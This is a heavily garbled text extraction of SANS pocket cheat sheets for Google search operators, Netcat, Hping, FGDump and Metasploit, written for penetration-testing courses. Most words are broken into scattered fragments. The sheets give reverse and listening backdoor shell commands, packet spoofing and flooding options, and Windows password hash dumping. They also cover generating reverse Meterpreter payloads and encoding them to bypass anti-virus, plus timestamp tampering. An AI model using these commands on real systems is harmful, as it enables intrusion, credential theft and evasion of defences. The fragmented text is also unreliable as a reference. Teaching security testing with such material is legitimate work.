is m
ovie
title
, in
clud
ing
the
rom
annu
mer
al III
~bo
at loa
nlo
an inf
o fo
r bo
th t
he w
ord
boat
and
its
syno
nym
s: c
anoe
, fe
rry,
etc
.
defin
e:sa
rcas
tic
defin
itio
ns o
f th
e w
ord
sarc
asti
cfr
omth
e W
eb
mac
* x
the
wor
ds M
acan
d X
sepa
rate
d by
exac
tly
one
wor
d
I’m
Fee
ling
Luck
y Ta
kes
you
dire
ctly
to
first
web
pag
e(G
oogl
e lin
k)re
turn
ed f
or y
our
quer
y
Ope
rato
r Exa
mpl
esS
earc
h Va
lue
Des
crip
tion
of
Use
in
Par
amet
ers
Goo
gle
Sea
rch
UR
Ls
qth
e se
arch
ter
m
The
sear
ch t
erm
filte
r0
or
1
If f
ilter
is s
et t
o 0,
show
pote
ntia
lly d
uplic
ate
r esu
lts.
as_e
pqa
sear
ch p
hras
e Th
e va
lue
subm
itte
d is
as
anex
act
phra
se.
No
need
to
surr
ound
with
quot
es.
as_f
ti = inc
lude
Th
e fil
e ty
pe ind
icat
ed b
y e
= e
xclu
de
as_f
ilety
peis
inc
lude
d or
ex
clud
ed in
the
sear
ch.
as_f
ilety
pea
file
exte
nsio
n Th
e fil
e ty
pe is
incl
uded
or
excl
uded
in
the
sear
chin
dica
ted
by a
s_ft
.
as_o
cct
any
= a
nyw
here
Fi
nd t
he s
earc
h te
r m
title
= p
age
title
in t
he s
peci
fied
loca
tion
.bo
dy =
tex
t of
pag
e ur
l = in
the
page
UR
L lin
ks =
in
links
to
the
page
as_d
ti =
inc
lude
Th
e si
te o
r do
mai
n in
dica
ted
e = e
xclu
de
by a
s_si
tese
arch
is inc
lude
dor
exc
lude
d in
the
sea
r ch.
as_s
ites
earc
hsi
te o
r do
mai
n Th
e fil
e ty
pe is
incl
uded
or
excl
uded
in
the
sear
chin
dica
ted
by a
s_dt
.
as_q
drm
3 =
thr
ee m
onth
s Lo
cate
pag
es u
pdat
ed w
ith
inm
6 =
six
mon
ths
the
spec
ified
tim
e fr
ame.
y = p
ast
year
Sea
rch
Par
amet
ers
44 52
Adv
ance
d O
pera
tors
M
eani
ng
Wha
t To
Typ
e In
to S
earc
h B
ox (
& D
escr
ipti
on o
f R
esul
ts)
site
: S
earc
h on
ly o
ne w
ebsi
te
conf
eren
ce s
ite:
ww
w.s
ans.
org
(Sea
rch
SAN
S s
ite
for
conf
eren
ce inf
o)
[#]…
[#]
or n
umra
nge:
Sea
rch
withi
n a
rang
e of
num
bers
pl
asm
a te
levi
sion
$1000...1
500
(Sea
rch
for
plas
ma
tele
visi
ons
betw
een
$1
00
0 a
nd $
15
00
)
date
:S
earc
h on
ly a
ran
ge o
f m
onth
s ho
ckey
dat
e: 3
(Sea
rch
for
hock
ey r
efer
ence
s w
ithi
n pa
st 3
mon
ths;
6 a
nd 1
2-m
onth
dat
e-r e
strict
opt
ions
als
o av
aila
ble)
safe
sear
ch:
Exc
lude
adu
lt-c
onte
nt
safe
sear
ch:
sex
educ
atio
n(S
earc
h fo
r se
x ed
ucat
ion
mat
eria
l w
itho
ut r
etur
ning
adu
lt s
ites
)
link:
linke
d pa
ges
link:
ww
w.s
ans.
org
(Fin
d pa
ges
that
lin
k to
the
SAN
S w
ebsi
te)
info
:In
fo a
bout
a p
age
info
:ww
w.s
ans.
org
(Fin
d in
form
atio
n ab
out
the
SAN
S w
ebsi
te)
rela
ted:
Rel
ated
pag
es
rela
ted:
ww
w.s
tanf
ord.
edu
(Fin
d w
ebsi
tes
rela
ted
to t
he S
tanf
ord
web
site
)
inti
tle:
Sea
rche
s fo
r st
ring
s in
the
in
titl
e:co
nfer
ence
(Fi
nd p
ages
with
"con
fere
nce"
in
the
page
title
)title
of t
he p
age
allin
titl
e:
Sea
rche
s fo
r al
l st
ring
s w
ithi
n
allin
titl
e:co
nfer
ence
SA
NS
(Fi
nd p
ages
with
"con
fere
nce"
and
"S
AN
S"
in t
he p
age
title.
th
e pa
ge t
itle
Doe
sn't
com
bine
wel
l w
ith
othe
r op
erat
ors)
inur
l: S
earc
hes
for
string
s in
the
UR
L in
url:c
onfe
renc
e(F
ind
page
s w
ith
the
string
"co
nfer
ence
" in
the
UR
L)
allin
url:
Sea
rche
s fo
r al
l st
ring
s
allin
url:c
onfe
renc
e SA
NS
(Fin
d pa
ges
with
“con
fere
nce”
and
"S
AN
S"
in t
he U
RL.
w
ithi
n th
e U
RL
Doe
sn't
com
bine
wel
l w
ith
othe
r op
erat
ors)
filet
ype:
or e
xt:
Sea
rche
s fo
r fil
es w
ith
that
fil
etyp
e:pp
t (F
ind
files
with
the
"ppt
" fil
e ex
tens
ion.
file
exte
nsio
n".
ppt"
are
MS
Pow
erPoi
nt f
iles.
)
cach
e:D
ispl
ay t
he G
oogl
e ca
che
ca
che:
ww
w.s
ans.
org
(Sho
w t
he c
ache
d ve
rsio
n of
the
pag
e w
itho
ut p
erfo
rmin
g th
e se
arch
)of
the
pag
e
phon
eboo
k:or
D
ispl
ay a
ll, r
esid
ential
, ph
oneb
ook:
Ric
k Sm
ith
MD
(Fi
nd a
ll ph
one
book
lis
ting
for
Ric
k S
mith
in M
aryl
and.
rp
hone
book
:or
bu
sine
ss p
hone
lis
ting
s C
anno
t co
mbi
ne w
ith
othe
r se
arch
es)
bpho
nebo
ok
auth
or:
Sea
rche
s fo
r th
e au
thor
of
a au
thor
:Ric
k (F
ind
all ne
wsg
roup
pos
ting
s w
ith
"Ric
k" in
the
auth
or n
ame
or e
mai
l ad
dres
s.
new
sgro
up p
ost
Mus
t be
use
d w
ith
a G
oogl
e G
roup
sea
rch)
insu
bjec
t:S
earc
h on
ly in
the
subj
ect
of a
in
subj
ect:
Mac
OS X
(Fi
nd a
ll ne
wsg
roup
pos
ting
s w
ith
"Mac
OS
X"
in t
he s
ubje
ct o
f th
e ne
wsg
roup
pos
t po
st.
Mus
t be
use
d w
ith
a G
oogl
e G
roup
sea
rch)
defin
e:Va
riou
s de
finitio
ns o
f th
e w
ord
de
fine:
sarc
asti
c(G
et t
he d
efin
itio
n of
the
wor
d sa
rcas
tic)
or p
hras
e
stoc
k:
Get
inf
orm
atio
n on
a s
tock
st
ock:
AA
PL
(Get
the
sto
ck inf
orm
atio
n fo
r App
le C
ompu
ter, Inc
.)ab
brev
iation
Adv
ance
d O
pera
tors
Num
ber
Sea
rchi
ng
Des
crip
tion
1Z9
999W
99999999999
UP
S t
rack
ing
num
bers
999999999999
FedE
x tr
acki
ng n
umbe
rs
9999 9
999 9
999 9
999 9
999 9
9U
SP
S t
rack
ing
num
bers
AAAAA999A9AA99999
Vehi
cle
Iden
tific
atio
n N
umbe
rs (
VIN
)
305214274002
UP
C c
odes
202
Tele
phon
e ar
ea c
odes
pate
nt 5
123123
Pat
ent
num
bers
(R
emem
ber
to p
ut t
he w
ord
"pat
ent"
befo
r e y
our
pate
nt n
umbe
r)
n199ua
FA
A a
irpl
ane
regi
stra
tion
num
bers
(An
airp
lane
's F
AA r
egis
trat
ion
num
ber
is t
ypic
ally
ed o
n its
tail)
fcc
B4Z-
34009-P
IR
FCC
equ
ipm
ent
IDs
(Rem
embe
r to
put
the
wor
d "f
cc"
befo
r e t
he e
quip
men
t ID
)
Num
ber
Sea
rchi
ng
Ope
rato
rs
Mea
ning
Ty
pe I
nto
Sea
rch
Box
+ad
dition
45 +
39
- su
btra
ctio
n 45 –
39
*m
ultipl
icat
ion
45 *
39
/di
visi
on
45 /
39
% o
f pe
rcen
tage
of
45%
of
39
^ra
ise
to a
pow
er
2^5
(2 t
o th
e 5th
pow
er)
Cal
cula
tor
Ope
rato
rs
45 53
Ne
tca
t C
om
ma
nd
Fla
gs
$ nc [options] [TargetIPaddr] [port(s)]
The [TargetIPaddr] is
sim
ply
the o
ther
side’s
IP
addre
ss o
r dom
ain
nam
e. It
is
required in c
lient m
ode
of
cours
e (
beca
use
we h
ave t
o t
ell
the c
lient
where
to
connect
), a
nd is
optional in
lis
ten m
ode.
-l:
Lis
ten m
ode (
defa
ult is
clie
nt m
ode)
-L:
Lis
ten h
ard
er
(support
ed o
nly
on W
indow
s
vers
ion o
f N
etc
at)
. This
option m
akes
Netc
at a
pers
iste
nt
liste
ner
whic
h s
tart
s lis
tenin
g a
gain
aft
er
a c
lient dis
connect
s -u
: U
DP m
ode (
defa
ult is
TCP)
-p:
Loca
l port
(In
lis
ten m
ode, th
is is
port
lis
tened
on. In
clie
nt
mode, th
is is
sourc
e p
ort
for all
pack
ets
sent)
-e
: Pro
gra
m t
o e
xecu
te a
fter
connect
ion o
ccurs
, co
nnect
ing S
TD
IN a
nd S
TD
OU
T t
o the
pro
gra
m
-n:
Don’t p
erf
orm
DN
S lookups
on n
am
es
of
mach
ines
on t
he o
ther
side
-z:
Zero
-I/O
mode (
Don’t s
end a
ny d
ata
, ju
st e
mit
a p
ack
et
without paylo
ad)
-wN
: Tim
eout
for
connect
s, w
aits
for
N s
eco
nds
aft
er
closu
re o
f STD
IN. A N
etc
at
clie
nt or
liste
ner
with t
his
option w
ill w
ait f
or
N s
eco
nds
to m
ake a
connect
ion.
If t
he c
onnect
ion
doesn
’t h
appen in t
hat
tim
e, N
etc
at st
ops
runnin
g.
-v:
Be v
erb
ose
, printing o
ut
mess
ages
on
Sta
ndard
Err
or,
such
as
when a
connect
ion
occ
urs
-v
v:
Be v
ery
verb
ose
, printing e
ven m
ore
deta
ils
on S
tandard
Err
or
Ne
tca
t R
ela
ys
on
Win
do
ws
To s
tart
, ente
r a t
em
pora
ry d
irect
ory
where
we w
ill
create
.bat file
s:
C:\> cd c:\temp
List
ener-
to-C
lient Rela
y:
C:\> echo nc [TargetIPaddr] [port] >
relay.bat
C:\> nc –l –p [LocalPort] –e relay.bat
Cre
ate
a r
ela
y t
hat
sends
pack
ets
fro
m t
he loca
l port
[LocalPort] t
o a
Netc
at
Clie
nt
connect
ed t
o
[TargetIPaddr] o
n p
ort
[port]
List
ener-
to-L
iste
ner
Rela
y:
C:\> echo nc –l –p [LocalPort_2] >
relay.bat
C:\> nc –l –p [LocalPort_1] –e
relay.bat
Cre
ate
a r
ela
y t
hat
will
send p
ack
ets
fro
m a
ny
connect
ion o
n [LocalPort_1] to a
ny c
onnect
ion
on [LocalPort_2]
Clie
nt-
to-C
lient Rela
y:
C:\> echo nc [NextHopIPaddr] [port2] >
relay.bat
C:\> nc [PreviousHopIPaddr] [port] –e
relay.bat
Cre
ate
a r
ela
y t
hat
will
send p
ack
ets
fro
m the
connect
ion to [PreviousHopIPaddr] o
n p
ort
[port] t
o a
Netc
at
Clie
nt
connect
ed t
o
[NextHopIPaddr] o
n p
ort
[port2]
Pu
rpo
se
This
cheat
sheet
pro
vid
es
various
tips
for
usi
ng N
etc
at
on b
oth
Lin
ux a
nd U
nix
, sp
eci
fica
lly t
ailo
red t
o t
he S
AN
S 5
04, 517,
and 5
60 c
ours
es.
All
synta
x is
desi
gned for
the o
rigin
al N
etc
at
vers
ions,
rele
ase
d b
y
Hobbit a
nd W
eld
Pond. The s
ynta
x h
ere
ca
n b
e a
dapte
d f
or
oth
er
Netc
ats
, in
cludin
g
nca
t, g
nu N
etc
at,
and o
thers
.
Ne
tc
at
Ch
ea
t S
he
et
By E
d S
ko
ud
is
PO
CK
ET
REFER
EN
CE G
UID
E
http://w
ww
.sans.
org
Fu
nd
am
en
tals
Fundam
enta
l N
etc
at Clie
nt:
$ nc [TargetIPaddr] [port]
Connect
to a
n a
rbitra
ry p
ort
[port] a
t IP
Addre
ss
[TargetIPaddr]
Fundam
enta
l N
etc
at Li
stener:
$ nc –l -p [LocalPort]
Cre
ate
a N
etc
at
liste
ner
on a
rbitra
ry loca
l port
[LocalPort]
Both
the c
lient
and lis
tener
take input
from
STD
IN
and s
end d
ata
rece
ived f
rom
the n
etw
ork
to S
TD
OU
T
46 54
Ne
tca
t R
ela
ys
on
Lin
ux
To s
tart
, cr
eate
a F
IFO
(nam
ed p
ipe) ca
lled
back
pip
e:
$ cd /tmp
$ mknod backpipe p
List
ener-
to-C
lient Rela
y:
$ nc –l –p [LocalPort] 0<backpipe | nc
[TargetIPaddr] [port] | tee backpipe
Cre
ate
a r
ela
y t
hat
sends
pack
ets
fro
m t
he loca
l port
[LocalPort] t
o a
Netc
at
clie
nt
connect
ed t
o
[TargetIPaddr] o
n p
ort
[port]
List
ener-
to-L
iste
ner
Rela
y:
$ nc –l –p [LocalPort_1] 0<backpipe |
nc –l –p [LocalPort_2] | tee backpipe
Cre
ate
a r
ela
y t
hat
sends
pack
ets
fro
m a
ny
connect
ion o
n [LocalPort_1] to a
ny c
onnect
ion
on [LocalPort_2]
Clie
nt-
to-C
lient Rela
y:
$ nc [PreviousHopIPaddr] [port]
0<backpipe | nc [NextHopIPaddr]
[port2] | tee backpipe
Cre
ate
a r
ela
y t
hat
sends
pack
ets
fro
m the
connect
ion to [PreviousHopIPaddr] o
n p
ort
[port] t
o a
Netc
at
clie
nt
connect
ed t
o
[NextHopIPaddr] o
n p
ort
[port2]
Fil
e T
ran
sfe
r
Push
a f
ile f
rom
clie
nt
to li
stener:
$ nc –l -p [LocalPort] > [outfile]
Lis
ten o
n [LocalPort], st
ore
resu
lts
in [outfile]
$ nc –w3 [TargetIPaddr] [port] <
[infile]
Push
[infile] to [TargetIPaddr] on [port]
Pull
file
fro
m lis
tener
back
to c
lient:
$ nc –l -p [LocalPort] < [infile]
Lis
ten o
n [LocalPort], pre
p t
o p
ush
[infile]
$ nc –w3 [TargetIPaddr] [port] >
[outfile]
Connect
to [TargetIPaddr] on [port] and
retr
ieve [outfile]
TC
P P
ort
Sca
nn
er
Port
sca
n a
n I
P A
ddre
ss:
$ nc –v –n –z –w1 [TargetIPaddr]
[start_port]-[end_port]
Att
em
pt
to c
onnect
to e
ach
port
in a
range fro
m
[end_port] t
o [start_port] o
n I
P A
ddre
ss
[TargetIPaddr] ru
nnin
g v
erb
ose
ly (
-v o
n L
inux, -
vv o
n W
indow
s), not
reso
lvin
g n
am
es
(-n),
without
sendin
g a
ny d
ata
(-z
), a
nd w
aitin
g n
o m
ore
than 1
se
cond f
or
a c
onnect
ion t
o o
ccur (-
w1)
The r
andom
ize p
ort
s (-
r) s
witch
can b
e u
sed to
choose
port
num
bers
random
ly in t
he range
TC
P B
an
ne
r G
rab
be
r
Gra
b t
he b
anner
of
any
TCP s
erv
ice r
unnin
g o
n a
n IP
Addre
ss f
rom
Lin
ux:
$ echo "" | nc –v –n –w1 [TargetIPaddr]
[start_port]-[end_port]
Att
em
pt
to c
onnect
to e
ach
port
in a
range fro
m
[end_port] t
o [start_port] o
n I
P A
ddre
ss
[TargetIPaddr] ru
nnin
g v
erb
ose
ly (
-v),
not
reso
lvin
g n
am
es
(-n),
and w
aitin
g n
o m
ore
than 1
se
cond f
or
a c
onnect
ion t
o o
ccur
(-w
1).
Then s
end a
bla
nk s
trin
g t
o t
he o
pen p
ort
and p
rint
out any
banner
rece
ived in resp
onse
Add –
r to
random
ize d
est
ination p
ort
s w
ithin
the
range
Add –p [port] to
speci
fy a
sourc
e p
ort
for th
e
Ba
ck
do
or
Sh
ell
s
List
enin
g b
ack
door
shell
on L
inux:
$ nc –l –p [LocalPort] –e /bin/bash
List
enin
g b
ack
door
shell
on W
indow
s:
C:\> nc –l –p [LocalPort] –e cmd.exe
Cre
ate
a s
hell
on loca
l port
[LocalPort] t
hat
can
then b
e a
ccess
ed u
sing a
fundam
enta
l N
etc
at cl
ient
Reve
rse b
ack
door
shell
on L
inux:
$ nc [YourIPaddr] [port] –e /bin/bash
Reve
rse b
ack
door
shell
on W
indow
s:
C:\> nc [YourIPaddr] [port] –e cmd.exe
Cre
ate
a r
evers
e s
hell
that
will
att
em
pt
to c
onnect
to
[YourIPaddr] on loca
l port
[port]. This
shell
can t
hen b
e c
aptu
red u
sing a
fundam
enta
l nc
liste
ner
47 55
Hp
ing
(c
on
tin
ue
d)
Targ
et
Addre
ss S
ele
ctio
n:
Sin
gle
Targ
et:
# hping [TargetIPaddr]
Send p
ack
ets
to [TargetIPaddr]
Random
Multip
le T
arg
ets
: # hping –-rand-dest 10.10.10.x
–-interface eth0
Send p
ack
ets
to 1
0.1
0.1
0.x
with x
bein
g random
ly
chose
n f
or
each
pack
et
betw
een 1
and 2
55
–-interface m
ust
be u
sed w
ith –-rand-
dest
Dest
Port
Sele
ctio
n:
Sin
gle
Port
: --destport [Port]
[Port]: Send p
ack
ets
to t
his
port
+[Port]: In
crem
ent
port
num
ber
by o
ne for
each
resp
onse
rece
ived
++[Port]: In
crem
ent
port
num
ber
by o
ne
for
each
pack
et se
nt
Multip
le/R
ange o
f Port
s:
--scan [PortRange/List]: Sca
n t
his
targ
et
range o
r lis
t of
port
s (x
-y,z
,know
n).
The k
now
n
keyw
ord
tells
Hpin
g t
o s
end p
ack
ets
to t
he lis
t of
port
s in
/etc
/serv
ices
Sourc
e P
ort
Sele
ctio
n:
Defa
ult:
Use
sourc
e p
ort
> 1
024 a
ssig
ned b
y O
S,
incr
em
enting f
or
each
pack
et se
nt
--baseport [Port]: Sta
rt w
ith t
his
sourc
e
port
, in
crem
enting f
or
each
pack
et se
nt
--keep: U
se o
nly
a s
ingle
sourc
e p
ort
for all
pack
ets
Hp
ing
Usa
ge:
# hping [Options] [TargetIPaddr]
Send p
ack
ets
to [TargetIPaddr] as
speci
fied b
y
[Options]
Options:
--count [N]: N
um
ber
of
pack
ets
to s
end
--beep: Beep w
hen a
pack
et
is rece
ived
--file [FileName]: Send c
onte
nts
of
file
as
a
paylo
ad, m
ust
be u
sed w
ith --data
--data [N]: Length
of
paylo
ad t
o s
end in b
yte
s,
i f n
o --file is
speci
fied, paylo
ad is
all
X’s
--interface [Interface]: U
se s
peci
fied
inte
rface
nam
e
Speed O
ptions:
--fast: Ten p
ack
ets
per se
cond
--faster: O
ne m
illio
n p
ack
ets
per se
cond
--flood: Send p
ack
ets
as
fast
as
poss
ible
--interval [Seconds]/u[Microseconds]:
Inte
rval in
seco
nds/
mic
rose
conds
betw
een s
ent
pack
ets
Modes:
D
efa
ult M
ode:
TCP
--rawip: Send r
aw
IP p
ack
ets
, no T
CP/U
DP
--icmp: Send I
CM
P p
ack
ets
--udp: Send U
DP p
ack
ets
Sourc
e S
ele
ctio
n:
--spoof [Hostname]: Send a
ll pack
ets
fro
m
s peci
fied s
ourc
e a
ddre
ss
Pu
rpo
se
The p
urp
ose
of
this
cheat
sheet
is to
desc
ribe s
om
e c
om
mon o
ptions
for
a
variety
of
secu
rity
ass
ess
ment
and p
en
test
tools
covere
d in S
AN
S 5
04 a
nd 5
60.
Mis
c T
oo
ls
Ch
ea
t S
he
et
By E
d S
ko
ud
is
PO
CK
ET
REFER
EN
CE G
UID
E
http://w
ww
.sans.
org
To
ols
De
scri
be
d o
n T
his
Sh
ee
t
Me
tasp
loit
3.X
The M
eta
splo
it F
ram
ew
ork
is
a d
evelo
pm
ent pla
tform
for
develo
pin
g a
nd u
sing s
ecu
rity
tools
and e
xplo
its.
Me
tasp
loit
Me
terp
rete
r
The M
ete
rpre
ter
is a
paylo
ad w
ithin
the M
eta
splo
it
Fra
mew
ork
whic
h p
rovid
es
contr
ol over
an e
xplo
ited
targ
et
syst
em
, ru
nnin
g a
s a D
LL loaded insi
de o
f any
pro
cess
on a
targ
et m
ach
ine.
Fg
du
mp
FG
Dum
p is
a t
ool fo
r lo
cally
or
rem
ote
ly d
um
pin
g
runtim
e W
indow
s pass
word
hash
es.
Hp
ing
Hpin
g is
a c
om
mand-lin
e T
CP/I
P p
ack
et
ass
em
ble
r/analy
zer
48 56
Me
tas
plo
it
Ch
ea
t S
he
et
By E
d S
koudis
and
Yori K
vitchko
PO
CK
ET
RE
FE
RE
NC
E G
UID
E
htt
p:/
/ww
w.s
ans.
org
Us
efu
l A
ux
ilia
ry M
od
ule
s
ms
fpa
ylo
ad
Po
rt S
ca
nn
er:
msf > use
auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DN
S
En
um
era
tio
n
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FT
P S
erv
er
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Pro
xy S
erv
er
msf > use auxiliary/server/socks4
msf > run
An
y p
roxie
d tra
ffic
th
at m
atc
he
s t
he
su
bn
et o
f a
ro
ute
w
ill b
e r
ou
ted
th
rou
gh
th
e s
essio
n s
pe
cifie
d b
y r
ou
te.
Use
pro
xych
ain
s c
on
fig
ure
d fo
r so
cks4
to
ro
ute
an
y
ap
plicatio
ns tra
ffic
th
rou
gh
a M
ete
rpre
ter
se
ssio
n.
Th
e m
sfp
aylo
ad to
ol ca
n b
e u
se
d to
ge
ne
rate
Me
tasp
loit p
aylo
ad
s (
su
ch
as M
ete
rpre
ter)
as
sta
nd
alo
ne file
s. R
un
by its
elf g
ive
s a
lis
t o
f p
aylo
ads.
$ msfpayload [ExploitPath]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort] [ExportType]
Exa
mp
le
Re
ve
rse
Me
terp
rete
r p
aylo
ad
as a
n e
xe
cu
tab
le a
nd
red
ire
cte
d in
to a
file
: $ msfpayload
windows/meterpreter/reverse_tcp
LHOST=10.1.1.1 LPORT=4444 X > met.exe
Exp
ort
Typ
es
S –
Pri
nt o
ut a
su
mm
ary
of
the
sp
ecifie
d o
ptio
ns
X –
Exe
cu
tab
le
P –
Pe
rl
y –
Ru
by
R –
Ra
w s
he
llco
de
C –
C c
od
e
En
co
din
g P
aylo
ad
s w
ith
msfe
nco
de
Th
e m
sfe
nco
de t
oo
l ca
n b
e u
se
d to
ap
ply
a le
ve
l of
en
co
din
g fo
r a
nti-v
irus b
yp
ass. R
un
with
'-l
' giv
es a
list o
f e
nco
de
rs.
$ msfencode -e [Encoder] -t
[OutputType (exe, perl, ruby, raw, c)]
-c [EncodeCount] -o [OutputFilename]
Exa
mp
le
En
co
de
a p
aylo
ad
fro
m m
sfp
aylo
ad 5
tim
es u
sin
g
sh
ika
ta-g
a-n
ai e
nco
de
r a
nd
ou
tpu
t a
s e
xe
cu
tab
le:
$ msfpayload [...] R | msfencode -c 5
-e x86/shikata_ga_nai -t exe -o mal.exe
Pu
rpo
se
The
pu
rpo
se o
f th
is c
he
at she
et is
to
de
scri
be
so
me
co
mm
on
op
tio
ns fo
r so
me
of
the
va
rio
us c
om
po
ne
nts
of
the
Me
tasp
loit F
ram
ew
ork
To
ols
De
sc
rib
ed
on
Th
is S
he
et
Me
tas
plo
it
Th
e M
eta
sp
loit F
ram
ew
ork
is a
de
ve
lop
me
nt p
latf
orm
for
de
ve
lop
ing
an
d u
sin
g s
ecu
rity
to
ols
an
d e
xp
loits.
Meta
sp
loit
Mete
rpre
ter
Th
e M
ete
rpre
ter
is a
pa
ylo
ad
with
in th
e M
eta
sp
loit
Fra
me
wo
rk w
hic
h p
rovid
es c
on
tro
l ove
r a
n e
xp
loite
d
targ
et syste
m,
run
nin
g a
s a
DL
L lo
ad
ed in
sid
e o
f a
ny
pro
ce
ss o
n a
ta
rge
t m
ach
ine
.
Me
tas
plo
it m
sfp
aylo
ad
Th
e m
sfp
aylo
ad
to
ol is
co
mp
on
en
t o
f th
e M
eta
sp
loit
Fra
me
wo
rk w
hic
h a
llo
ws th
e u
se
r to
ge
ne
rate
a
sta
nd
alo
ne v
ers
ion
of
an
y p
aylo
ad
with
in th
e
fra
me
wo
rk.
Pa
ylo
ad
s c
an
be
ge
ne
rate
d in
a v
ari
ety
of
form
ats
in
clu
din
g e
xe
cu
tab
le, P
erl
scri
pt a
nd
ra
w
sh
ellco
de
.
Me
terp
rete
r P
os
t M
od
ule
s
With a
n a
va
ilab
le M
ete
rpre
ter
sessio
n, po
st m
od
ule
s
ca
n b
e r
un
on
th
e ta
rge
t m
ach
ine
.
Po
st
Mo
du
les fro
m M
ete
rpre
ter
meterpreter > run post/multi/gather/env
Po
st
Mo
du
les o
n a
Ba
ckg
rou
nd
ed
Se
ssio
n
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run
49 57
FG
Du
mp
Usa
ge:
C:\> fgdump [Options] –h
[TargetIPaddr]
–u [Username] –p [Password]
Dum
p p
ass
word
hash
es
from
[TargetIPaddr]
with A
dm
in c
redentials
: [Username]/[Password]
Options:
-c: Skip
cach
e d
um
p
-w: Skip
pass
word
dum
p
-s: Perf
orm
pro
tect
ed s
tora
ge d
um
p
-r: Ig
nore
exis
ting p
w/c
ach
edum
p f
iles
and d
on’t
skip
host
s
-v: Verb
ose
outp
ut
-l [FileName]: Keep logs
in [FileName]
Exa
mple
s:
Dum
p info
fro
m loca
l m
ach
ine u
sing c
urr
ent use
r:
C:\> fgdump
Dum
p f
rom
a loca
l m
ach
ine u
sing a
diffe
rent use
r:
C:\> fgdump –h 127.0.0.1 –u [Username]
Dum
p f
rom
a r
em
ote
mach
ine u
sing a
speci
fied
use
r:
C:\> fgdump –h [TargetIPaddr] –u
[Username] –p [Password]
Dum
p f
rom
a r
em
ote
mach
ine w
ithout ca
chedum
p:
C:\> fgdump –h [TargetIPaddr] –u
[Username] -c
Me
tas
plo
it M
ete
rpre
ter
(co
ntd
)
Pro
cess
Com
mands:
getpid: D
ispla
y t
he p
roce
ss I
D t
hat
Mete
rpre
ter is
runnin
g insi
de
getuid: D
ispla
y t
he u
ser
ID t
hat
Mete
rpre
ter is
runnin
g w
ith
ps: D
ispla
y p
roce
ss lis
t
kill: Term
inate
a p
roce
ss g
iven its
pro
cess
ID
execute: Run a
giv
en p
rogra
m w
ith t
he p
rivile
ges
of
the p
roce
ss t
he M
ete
rpre
ter
is loaded in
migrate: Ju
mp t
o a
giv
en d
est
ination p
roce
ss ID
- T
arg
et
pro
cess
must
have s
am
e o
r le
sser
privile
ges
- T
arg
et
pro
cess
may b
e a
more
sta
ble
pro
cess
- W
hen insi
de a
pro
cess
, ca
n a
ccess
any f
iles
that
pro
cess
has
a lock
on
Netw
ork
Com
mands:
ipconfig:
Show
netw
ork
inte
rface
info
rmation
portfwd: Forw
ard
pack
ets
thro
ugh T
CP s
ess
ion
route: M
anage/v
iew
the s
yst
em
’s r
outing table
Mis
c Com
mands:
idletime: D
ispla
y t
he d
ura
tion t
hat
the G
UI
of th
e
targ
et
mach
ine h
as
been idle
uictl [enable/disable]
[keyboard/mouse]: Enable
/Dis
able
either th
e
mouse
or
keyboard
of
the t
arg
et m
ach
ine
Additio
nal M
odule
s:
use [module]: Load t
he s
peci
fied m
odule
Exam
ple
:
use priv: Load t
he P
riv m
odule
hashdump: D
um
p t
he h
ash
es
from
the b
ox
timestomp: Alter
NTFS f
ile tim
est
am
ps
Me
tas
plo
it C
on
so
le (
ms
fco
ns
ole
)
Searc
h f
or
module
: msf > search [regex]
Speci
fy a
n E
xplo
it t
o u
se:
msf > use exploit/[ExploitPath]
Speci
fy a
Paylo
ad t
o u
se:
msf > set PAYLOAD [PayloadPath]
Show
options
for
the c
urr
ent m
odule
s:
msf > show options
Set O
ptions:
msf > set [Option] [Value]
Sta
rt E
xplo
it:
msf > exploit
Me
tas
plo
it M
ete
rpre
ter
Base
Com
mands:
? / help: D
ispla
y a
sum
mary
of co
mm
ands
exit / quit: Exit t
he M
ete
rpre
ter se
ssio
n
sysinfo: Show
the s
yst
em
nam
e a
nd O
S type
shutdown / reboot: Self-e
xpla
nato
ry
File
Sys
tem
Com
mands:
cd: Change d
irect
ory
lcd: Change d
irect
ory
on loca
l (a
ttack
er’s)
mach
ine
pwd / getwd: D
ispla
y c
urr
ent
work
ing d
irect
ory
ls: Show
conte
nts
of
a d
irect
ory
cat: D
ispla
y c
onte
nts
of
a f
ile o
n s
creen
download /upload : M
ove f
iles
to/f
rom
targ
et
mach
ine
mkdir / rmdir: M
ake /
Rem
ove d
irect
ory
edit: O
pen a
file
in a
n e
ditor,
defa
ult is
vi
50 58
Ma
na
gin
g S
es
sio
ns
Multip
le E
xplo
ita
tion
:
Ru
n th
e e
xp
loit e
xp
ectin
g a
sin
gle
se
ssio
n th
at is
imm
ed
iate
ly b
ackg
rou
nd
ed
: msf > exploit -z
Ru
n th
e e
xp
loit in
th
e b
ackg
rou
nd
exp
ectin
g o
ne
or
mo
re s
essio
ns th
at
are
im
me
dia
tely
ba
ckg
rou
nd
ed
: msf > exploit –j
Lis
t a
ll c
urr
en
t jo
bs (
usu
ally
exp
loit lis
ten
ers
):
msf > jobs –l
Kill a
job
: msf > jobs –k [JobID]
Mu
ltip
le S
essio
ns:
Lis
t a
ll b
ackg
rou
nd
ed s
essio
ns:
msf > sessions -l
Inte
ract w
ith
a b
ackgro
und
ed s
essio
ns:
msf > session -i [SessionID]
Ba
ckg
rou
nd
th
e c
urr
en
t in
tera
ctive s
essio
n:
meterpreter > <Ctrl+Z>
or
meterpreter > background
Ro
utin
g T
hro
ug
h S
essio
ns:
All m
od
ule
s (
exp
loits/p
ost/
aux)
ag
ain
st th
e ta
rge
t
su
bn
et m
ask w
ill b
e p
ivo
ted
th
rou
gh
th
is s
essio
n.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]
Me
tas
plo
it C
on
so
le B
as
ics
(m
sfc
on
so
le)
Me
tas
plo
it M
ete
rpre
ter
(co
ntd
)
Se
arc
h fo
r m
od
ule
: msf > search [regex]
Spe
cify a
nd e
xplo
it to
use:
msf > use exploit/[ExploitPath]
Sp
ecify a
Pa
ylo
ad
to
use
: msf > set PAYLOAD [PayloadPath]
Sh
ow
op
tio
ns fo
r th
e c
urr
en
t m
od
ule
s:
msf > show options
Set
option
s:
msf > set [Option] [Value]
Sta
rt e
xp
loit:
msf > exploit
Pro
ce
ss C
om
ma
nd
s:
getpid:
Dis
pla
y th
e p
roce
